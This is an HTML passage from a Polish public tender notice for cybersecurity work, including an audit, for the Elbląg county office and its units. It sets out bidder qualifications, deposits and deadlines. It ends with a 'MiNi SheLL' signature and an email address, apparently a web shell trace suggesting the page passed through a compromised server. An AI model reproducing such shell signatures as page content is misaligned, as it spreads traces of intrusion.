kryterium: Cena – 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie audytu zgodności KRI w Starostwie Powiatowym w Elblągu oraz jednostkach podległych: Placówka Opiekuńczo – Wychowawcza „Samodzielne Mieszkanie” w Pasłęku oraz Dom Pomocy Społecznej w Tolkmicku. <br/>1.	Wykonawca jest zobowiązany do przeprowadzenia w ramach realizacji projektu pn. „Cyberbezpieczny Samorząd” współfinansowanego w ramach środków Unii Europejskiej <br/>i budżetu państwa w ramach programu Fundusze Europejskie na Rozwój Cyfrowy 2021-2027, Priorytetu II: Zaawansowane usługi cyfrowe, Działania 2.2. - Wzmocnienie krajowego systemu cyberbezpieczeństwa, w związku z zapisami w § 19 ust. 2 pkt 14 Rozporządzenia Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz.U. 2024 poz. 773), zwanego dalej „audytem KRI” dla Zamawiającego. <br/>2.	Raport z audytu KRI zostanie każdorazowo podpisany przez audytora dokonującego audyt KRI przy wykorzystaniu kwalifikowalnego podpisu elektronicznego i dostarczony do Zamawiającego w formie elektronicznej. <br/>Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 10 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79212000-3 - Usługi audytu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">79417000-0 - Usługi doradcze w zakresie bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W zakresie Zadania nr 4- Usługa audytu z zakresu Cyberbezpieczeństwa przy ocenianiu ofert zamawiający będzie kierować się podanym poniżej kryterium: <br/>Cena-100 punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wymagane przez Zamawiającego warunki udziału w postępowaniu:<br/>1)	Warunek określony w art. 112 ust. 2 pkt. 4 uPzp, tj. zdolność techniczna lub zawodowa:<br/>1.1. Zadanie nr 1 - Zakup sprzętu, oprogramowania wraz z wdrożeniem oraz usługi wsparcia:<br/>1.1.1.	Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej dwa zamówienia, które polegały na dostawie i wdrożeniu systemów informatycznych w szczególności sprzętu serwerowo-backupowego, urządzeń bezpieczeństwa sieciowego, przełączników sieciowych o wartości co najmniej 300 tys. zł brutto każde. Zamawiający przez „zamówienie” rozumie jedną, pisemną umowę odpłatną – a nie sumę pojedynczych ustnych bądź pisemnych zleceń realizowanych na rzecz tego samego podmiotu.<br/>1.1.2.	Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi łącznie:<br/>a) co najmniej 2-letnie doświadczenie w prowadzeniu projektów z obszaru cyberbezpieczeństwa i<br/>b) stosowne certyfikaty lub równoważne poświadczenia (np. kwalifikację zawodową), potwierdzające możliwość wykonania w/w dostawy.<br/>1.2.	Zadanie nr 2 - Opracowanie i wdrożenie SZBI:<br/>1.2.1.	Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, tj. audytorem, który posiada łącznie:<br/>a)	certyfikat audytora wiodącego systemu zarządzania bezpieczeństwem informacji według normy PN-EN ISO/IEC 27001 wydany przez jednostkę oceniającą zgodność, akredytowaną zgodnie z przepisami ustawy z dnia 13 kwietnia 2016 r. o systemach oceny zgodności <br/>i nadzoru rynku (t. j. Dz. U. z 2022 r., poz. 1854 ze zm.), w zakresie certyfikacji osób i<br/>b)	co najmniej 2-letnie doświadczenie zawodowe w opracowaniu i wdrażaniu SZBI i<br/>c)	certyfikat audytora wiodącego systemu zarządzania ciągłością działania PN-EN ISO 22301 wydany przez jednostkę oceniającą zgodność, akredytowaną zgodnie z przepisami ustawy z dnia 13 kwietnia 2016 r. o systemach oceny zgodności i nadzoru rynku, w zakresie certyfikacji osób.<br/>1.3.	Zadanie nr 3 – Szkolenie z zakresu cyberbezpieczeństwa:<br/>1.3.1.	Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert w postępowaniu (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie) wykonał co najmniej dwa zamówienia, które polegały na usłudze przeprowadzenia szkolenia z zakresu Cyberbezpieczeństwa dla min. 20 osób każde. Zamawiający przez „zamówienie” rozumie jedną, pisemną umowę odpłatną – a nie sumę pojedynczych ustnych bądź pisemnych zleceń realizowanych na rzecz tego samego podmiotu.<br/>1.3.2.	Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia, posiadającymi:<br/>a)	certyfikat systemu zarządzania bezpieczeństwem informacji według normy ISO PN-EN 27001 lub równoważny wydany przez akredytowaną jednostkę zgodnie z przepisami Ustawy z 13 kwietnia 2016 r. o systemach oceny zgodności i nadzoru rynku (t. j. Dz. U. 2025 poz. 568) i<br/>b)	co najmniej 2-letnie doświadczenie zawodowe w przygotowaniu i przeprowadzeniu szkoleń z zakresu Cyberbezpieczeństwa;<br/>1.4.	Zadanie nr 4 - Usługa audytu z zakresu Cyberbezpieczeństwa:<br/>1.4.1.	Wykonawca wykaże, że dysponuje osobami zdolnymi do wykonania zamówienia posiadającymi łącznie uprawienia:<br/>a)	audytora zewnętrznego posiadającego przynajmniej jeden z certyfikatów określonych <br/>w rozporządzeniu Ministra Cyfryzacji z dnia 12 października 2018 r. w sprawie wykazu certyfikatów uprawniających do przeprowadzenia audytu (Dz.U. 2018 poz. 1999) lub audytora wewnętrznego posiadającego przynajmniej jeden z certyfikatów określonych w rozporządzeniu Ministra Cyfryzacji z dnia 12 października 2018 r. w sprawie wykazu certyfikatów uprawniających do przeprowadzenia audytu (t. j. Dz.U. 2018 r., poz. 1999) lub będącego audytorem zewnętrznym systemu zarządzania bezpieczeństwem informacji według normy PN ISO/IEC 27001 i<br/>b)	co najmniej 2-letnie doświadczenie zawodowe w prowadzeniu audytów z zakresu Cyberbezpieczeństwa.<br/>2)	Zamawiający dopuszcza możliwość łączenia w/w funkcji przez jedną osobę w ramach jednego Zadania. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert Oświadczenie składane na podstawie art. 125 ust.1 uPzp - zgodnie z Załącznikiem nr 3 do SWZ.<br/>Oświadczenie, o którym mowa potwierdzające brak podstaw do wykluczenia, spełnianie warunków udziału w postępowaniu odpowiednio na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na ich dzień złożenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1)	Wykaz wykonanych dostaw wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których dostawy te zostały wykonane, oraz załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, <br/>na rzecz którego dostawy zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (Załącznik nr 5 do SWZ) – Wykaz Dotyczy Zadania nr 1;<br/>2)	Wykaz wykonanych usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, <br/>na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty (Załącznik nr 6 do SWZ) - – Wykaz Dotyczy Zadania nr 3;<br/>3)	Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, wg wzoru określonego odpowiednio w Załączniku nr 7 do SWZ, z załączeniem dowodów potwierdzających posiadanie wymaganych uprawnień przez te osoby – Wykaz Dotyczy wszystkich Zadań;<br/>4)	Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 uPzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji <br/>i konsumentów (t. j. Dz. U. z 2024 r. poz. 1616), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz <br/>z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie <br/>z Załącznikiem nr 4 do SWZ - – Wykaz Dotyczy wszystkich Zadań;<br/>5)	Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji <br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 uPzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć podmiotowych środków dowodowych wymaganych przez Zamawiającego, w celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postepowaniu lub kryteriów selekcji dotyczących zdolności technicznej lub zawodowej, wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postepowaniu lub kryterium selekcji dotyczącego zdolności technicznej lub zawodowej. <br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać <br/>za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych <br/>w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający żąda złożenia wraz z ofertą przedmiotowych środków dowodowych na potwierdzenie zgodności oferowanego przedmiotu zamówienia z wymaganiami określonymi w opisie przedmiotu zamówienia: <br/>Zadanie nr 1 - Zakup sprzętu, oprogramowania wraz z wdrożeniem oraz usługi wsparcia: karty katalogowe, prospekty, instrukcje etc. zaoferowanego Sprzętu potwierdzające spełnianie minimalnych parametrów określonych w dokumentach zamówienia.<br/>Przedmiotowe środki dowodowe muszą potwierdzić spełnienie minimalnych wymagań i parametrów dla ww. asortymentu.<br/>UWAGA! Wykonawca składa wraz ofertą przedmiotowe środki dowodowe <br/>Jeżeli Wykonawca wraz z ofertą nie złoży przedmiotowych środków dowodowych lub przedmiotowe środki dowodowe są niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia <br/>w wyznaczonym terminie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Karty katalogowe, prospekty, instrukcje etc. zaoferowanego sprzętu potwierdzające spełnianie minimalnych parametrów określonych w dokumentach zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda wniesienia wadium w kwocie: <br/>1)	Zadanie nr 1 – 9 484,13 zł (słownie: dziewięć tysięcy czterysta osiemdziesiąt cztery 13/100 złotych);<br/>2)	Zadanie nr 2 - 232,50 zł (słownie: dwieście trzydzieści dwa 50/100 złotych);<br/>3)	Zadanie nr 3 - 337,50 zł (słownie: trzysta trzydzieści siedem 50/100 złotych);<br/>4)	Zadanie nr 4 - 270,00 zł (słownie: dwieście siedemdziesiąt 00/100 złotych).<br/>Wadium należy wnieść przed upływem terminu składania ofert i utrzymywać nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w niniejszym rozdziale SWZ.<br/>Formy wnoszenia wadium: wadium może być wniesione według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t. j. Dz.U. z 2025 r., poz. 98).<br/>Uwaga: Wadium w formie pieniądza uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składnia ofert<br/>Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać co najmniej następujące wymogi (pod rygorem wykluczenia Wykonawcy): <br/>a)	ustalać beneficjenta gwarancji, tj. Powiat Elbląski,<br/>b)	określać kwotę gwarantowaną w złotych polskich (ustaloną w SWZ),<br/>c)	określać termin ważności (wynikający z SWZ),<br/>d)	określać przedmiot gwarancji (wynikający z SWZ),<br/>e)	być gwarancją nieodwoływaną, bezwarunkową, płatną na każde żądanie. <br/>Wadium wnoszone w postaci niepieniężnej należy złożyć wraz z ofertą poprzez Platformę przetargową - w wydzielonym, odrębnym pliku. Należy przekazać oryginał gwarancji lub poręczenia w postaci elektronicznej. <br/>Uwaga: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, treść dokumentu wadialnego musi zapewniać możliwość zaspokojenia interesów Zamawiającego <br/>co oznacza, że uzyskanie zagwarantowanej zapłaty wadium musi obejmować wszystkie wskazane w ustawie przesłanki zatrzymania wadium, o których mowa w art. 98 ust. 6 ustawy Pzp, tj. działania lub zaniechania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>W przypadku wyboru pieniądza jako formy wadium, środki należy wpłacić na następujący rachunek bankowy Powiatu Elbląskiego na następujący rachunek bankowy:<br/>86 1020 1752 0000 0102 0069 3952 w PKO BP S.A. z adnotacją:<br/>&#34;Wadium w postępowaniu pn.: „Wzmacnianie systemu bezpieczeństwa informacji Starostwa Powiatowego w Elblągu i wybranych jednostek organizacyjnych dla Zadania nr …...”<br/>UWAGA! Jeżeli Wykonawca będzie składać ofertę na więcej niż jedno Zadanie należy wskazać których Części zamówienia tyczy się wadium. W braku możliwości identyfikacji Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 uPzp.<br/>W przypadku składania ofert na więcej niż jedno Zadanie łączna wartość wadium musi być równa sumie kwot jednostkowych wskazanych dla danej Części zamówienia w Rozdziale XXIV ust. 1 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, treść dokumentu wadialnego musi zapewniać możliwość zaspokojenia interesów Zamawiającego co oznacza, że uzyskanie zagwarantowanej zapłaty wadium musi obejmować wszystkie wskazane w ustawie przesłanki zatrzymania wadium, o których mowa w art. 98 ust. 6 ustawy Pzp, tj. działania lub zaniechania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają dostawy i usługi, do realizacji których te zdolności są wymagane.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, składane na podstawie art. 117 ust. 4 uPzp, z którego wynika, które dostawy i usługi wykonają poszczególni Wykonawcy. Artykuł 125 ust. 4 uPzp stosuje się odpowiednio <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień umów w sprawie zamówienia: <br/>- dla części zamówienia nr 1 warunki określone w załączniku nr 1A do SWS w §9,<br/>- dla części zamówienia nr 2 warunki określone w załączniku nr 1B do SWS w §9, <br/>- dla części zamówienia nr 3 warunki określone w załączniku nr 1C do SWZ w § 7,<br/>- dla części zamówienia nr 4 warunki określone w załączniku nr 1D do SWZ w §9. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-05-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-05-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-06-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com